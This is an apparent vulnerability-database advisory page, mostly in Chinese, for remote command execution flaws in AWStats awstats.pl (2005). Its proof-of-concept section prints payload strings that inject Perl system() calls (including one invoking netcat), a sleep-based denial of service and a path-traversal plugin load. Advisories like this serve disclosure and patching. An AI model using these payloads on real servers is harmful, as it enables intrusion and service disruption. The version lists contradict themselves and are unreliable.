发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:46:04

[原文] in AWStats 4.0 and 6.2 allows remote attackers to execute arbitrary commands via shell metacharacters in the config parameter.

[CNNVD]AWStats awstats.pl多个参数远程执行命令漏洞(CNNVD-200505-543)


- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

AWStats awstats.pl多个参数远程执行命令漏洞
高危 设计错误
2005-05-02 00:00:00 2005-10-20 00:00:00

- 公告与补丁


- 漏洞信息

AWStats Plugin Multiple Remote Command Execution Vulnerabilities
Design Error 12543
Yes No
2005-02-14 12:00:00 2009-07-12 10:06:00
GHC <> is credited with the disclosure of this issue.

- 受影响的程序版本

AWStats AWStats 6.3
AWStats AWStats 6.2
AWStats AWStats 6.1
AWStats AWStats 6.0
AWStats AWStats 5.9
AWStats AWStats 5.8
AWStats AWStats 5.7
AWStats AWStats 5.6
AWStats AWStats 5.5
AWStats AWStats 5.4
AWStats AWStats 5.3
AWStats AWStats 5.2
AWStats AWStats 5.1
AWStats AWStats 5.0
AWStats AWStats 4.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
AWStats AWStats 6.5.0 build 1.857
AWStats AWStats 6.3
AWStats AWStats 5.6
AWStats AWStats 6.5.0 build 1.857

- 不受影响的程序版本

AWStats AWStats 6.3
AWStats AWStats 5.6
AWStats AWStats 6.5.0 build 1.857

- 漏洞讨论

Multiple remote command execution vulnerabilities reportedly affect AWStats. These issues are due to an input validation error that allows a remote attacker to specify commands to be executed in the context of the affected application.

The first problem presents itself due to the potential of malicious use of the 'loadplugin' and 'pluginmode' parameters of the '' script. The second issue arises from an insecure implementation of the 'loadplugin' parameter functionality.

An attacker may leverage these issues to execute arbitrary commands with the privileges of the affected web server running the vulnerable scripts. This may facilitate unauthorized access to the affected computer, as well as other attacks.

Multiple sources have reported that AWStats 6.3 and subsequent versions are not vulnerable to these issues.

- 漏洞利用

The following proof of concepts have been provided:

To execute arbitrary commands:;PluginMode=:print+getpwent;PluginMode=:print+system('id')+;;PluginMode=:print+system('nc+')+;

To trigger a denial of service condition:;hack=$rp&amp;PluginMode=:sleep

To load the 'blib' Perl module:;loadplugin=../../../../usr/libdata/perl/5.00503/blib

The following proof of concept was provided by &lt;;: http://xxx/awstats/ (?/bin/ls?);

The following proof of concept has been made available:

- 解决方案

Debian has released advisory DSA 682-1 to address these issues. Please see the referenced advisory for more information.

AWStats AWStats 4.0

- 相关参考